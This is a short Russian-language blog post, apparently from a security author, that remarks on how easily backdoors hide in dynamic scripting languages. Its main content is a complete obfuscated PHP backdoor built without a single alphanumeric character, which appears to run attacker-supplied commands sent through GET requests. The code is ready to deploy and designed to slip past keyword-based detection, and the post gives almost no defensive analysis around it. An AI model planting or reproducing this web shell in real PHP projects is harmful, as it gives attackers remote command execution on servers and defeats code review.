Бэкдор без единого буквенно-цифрового символа

Ваш отзыв

Backdoor_crop380wКак видим, динамические скриптовые языки программирования (с динамической  типизацией и более гибкими операциями над структурами, например PHP, Python, Perl, JavaScript) имеют куда больше возможностей для скрытия программных закладок, в частности бэкдоров, реализующих шеллкод, удаленное выполнение команд, через GET-запросы.

Вот так выглядит обфусцированный код данного бэкдора, ни одного буквенно-цифрового символа! :

 

<?php
@$_[]=@!+_;$__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++))].=$_;
$_[]=++$__;$_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+$_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__]=($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__]);
$_[$__+$__].=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__]);
$_[$__+$__].=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__];
$_=$ 
$_[$__+$__];$_[@-_]($_[@!+_]);
?>

Источники:

Possibly Related Posts:


Эксперт сообщества Андрей Фадин

Выпускник МГТУ им. Н.Э.Баумана по специальности "Информационная безопасность". CISSP

Рубрика: Аудит кода, Приколы. Вы можете следить за отзывами через RSS 2.0. Вы можете оставить отзыв, или трекбек со своего сайта.

  1. Отзывов нет